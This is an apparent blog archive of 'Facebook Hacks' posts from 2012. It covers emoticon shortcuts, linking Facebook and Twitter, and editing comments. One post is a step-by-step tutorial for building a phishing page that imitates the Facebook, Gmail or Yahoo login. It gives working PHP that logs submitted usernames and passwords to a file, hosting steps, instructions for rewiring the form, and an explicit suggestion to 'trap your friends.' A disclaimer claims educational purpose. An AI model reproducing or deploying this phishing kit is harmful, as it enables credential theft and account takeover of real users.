Showing posts with label Facebook Hacks. Show all posts
Showing posts with label Facebook Hacks. Show all posts

Sunday, October 21, 2012

Now Use Facebook Emoticons (Smileys) In Comments



We all know Facebook has feature that allows users to use emoticons (smileys) in chat. Nowadays Facebook users are also using smileys in comments. The use of emoticons or smileys in comments and chat is increasing day by day. To use Facebook emoticons or smileys, you must know the keyboard shortcuts for corresponding smiley. And as these keyboard shortcuts are pretty standard, new Facebook user might don't know much about keyboard shortcut for a particular smiley.

So we are sharing keyboard shortcuts for mostly used smileys here.

Smiley Name Shortcut
smile smile :-) :) :] =)
frown frown :-( :( :[ =(
gasp gasp :-O :O :-o :o
curly lips wink ;-) ;)
curly lips curly lips :3
grumpy grumpy >:( >:-(
glasses glasses 8-) 8) B-) B)
devil devil 3:) 3:-)
42 Thumbs Up (Y)

To use smile emoticons you have to type :-) or :). These are the few emoticons i have listed, to see full list of emoticons go to www.fbsmileys.com.
So use the emoticons to express your feelings. Also be careful because overuse of it will be annoying for others.
What do you think? Is this Facebook emoticons feature is good ? Please let us know what you think about Facebook emoticons. Share your views in commentBox. Thanks !
 

Tuesday, September 11, 2012

How To Connect Facebook To Twitter or Twitter To Facebook

connect facebook twitter
You can now easily link your personal Facebook profile or page to your Twitter account, and publish your “public” status updates directly to Twitter. Save the hassle of logging into two websites just to update your current status. You can link your Twitter and Facebook accounts together and save heaps of time.

There are two ways to link Facebook and twitter
1) Connect your Facebook profile to twitter :
Update your Facebook status and it will also appear on your twitter profile.
2) Connect your twitter profile to Facebook :
Tweet from your twitter account and it will also appear on your Facebook profile.
How to connect your Facebook profile to twitter?
1) Go to http://www.facebook.com/twitter
2) Choose your Facebook account(your personal profile or page) and then click “Link to Twitter”
connect facebook twitter
















3) Then it ask for username and password of your twitter account to authorize the connection.
connect facebook twitter
 4) Choose which items you’d like to send to Twitter, of course they’ll have to be marked as “Public” for them to be shared.
connect facebook twitter
 5) Here’s what a Tweet directly from a Facebook public status update looks like. The link goes right to the destination, rather than through Facebook.
connect facebook twitter
 6) There you have it, now you can easily and seamlessly send your public Facebook status stream to Twitter.
How to Connect Twitter to Facebook:
1) Log in to Facebook and access the Twitter application by navigating to https://apps.facebook.com/twitter/
2) Click on “go to your twitter profile setting to start”
connect twitter to facebook
3) Log in to your twitter account, then it will redirect you to your profile page where in facebook section click on “post your tweets to facebook”.
connect twitter to facebook

 4) Allow and authorize access for Twitter to Facebook.
connect twitter to facebook
 5) Now every time you update your Twitter account, your Facebook status will update automatically.
That's it. Done ! Please share your views in comment Box. 

Tuesday, September 4, 2012

How To Create Phishing Page For Facebook, Gmail, Yahoo


What is phishing?
The method in which the user receives a message with a link directing them to a fake phishing website which has the same look and feel as the legitimate website. If the user doesn’t look at the URL, it may be hard to tell the difference between the fake and legitimate websites. Then, the user is asked to provide personal information on the page for example username and password.
How to create Phishing Page For Facebook, Gmail, Yahoo :

1) Requirements :
(a) Fake Login Page
(b) getLoginDetails Page
(c) Free Web Hosting Account
2) How To Create Fake Login Page :
a) Open the www.facebook.com/login.php or login page for which you want to create a phishing page.
b) Save the page on desktop as .html
phishing page


3) How to create getLoginDetail page :
a) Open the notepad and paste the following code.
<?php
header ('Location: http://techehub.blogspot.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
b) 2nd line i.e. “Location” is that where you want to redirect your victim. If you want to redirect it to facebook  then change it to “https://www.facebook.com/login.php?login_attempt=1” 
c) Save the file as getLoginDetails.php 
4) Free Web Hosting : 
a) You have to upload these two pages to a free web hosting site. I recommend to use 000webhost as it is free and also supports the php files.
b) Login to your account and choose file manager to upload file. 
c) Upload pages under the public_html dir
d) After uploading these two page you will get the url for those page. It looks something like www.your-website-name.net63.net/login and www.your-website-name.net63.net/getLoginDetails.php
5) Final step :
a) Open the login.html(uploaded in 000webhost) in notepad.
b) Find the string “action”(using ctrl+f), you will see something like action=https://www.facebook.com/login.php?login_attempt=1
c) Replace the https://www.facebook.com/login.php?login_attempt=1  with your getloginDetail page url like www.your-website-name.net63.net/getloginDetails.php and save the page.
d) Now open the www.your-website-name.net63.net/login, it look like a real facebook login page. Enter the username and password and you will notice that a log.txt file is created in your webhosting account. It contain the username and password.
e) Use this link to trap your friends and get their username and password. Thats it. Done !
Note : Hacking is a crime. Do not use this tutorial to hack innocent people. I am sharing this tutorial for educational purpose only. I will not responsible for any damage done by you. 

Monday, June 25, 2012

How to edit your comments on facebook

You Can Now Edit Your Comments on Facebook. If you've ever made a horrible comment on Facebook or dropped an embarrassing typo on a friend's status update, then you'll be happy to hear that you can now fully edit comments on Facebook posts.
You could edit comments before if you did so within the first minute of making a comment, but now you can do it any time you like.

How to edit comments :

  • To edit a comment, click the small pen symbol next to your comment.
  • click "Edit" and change the text to your liking.

Before you go rewriting your entire history you should know that when you edit a comment it will have an "Edited" link below it so people can look back on anything you change.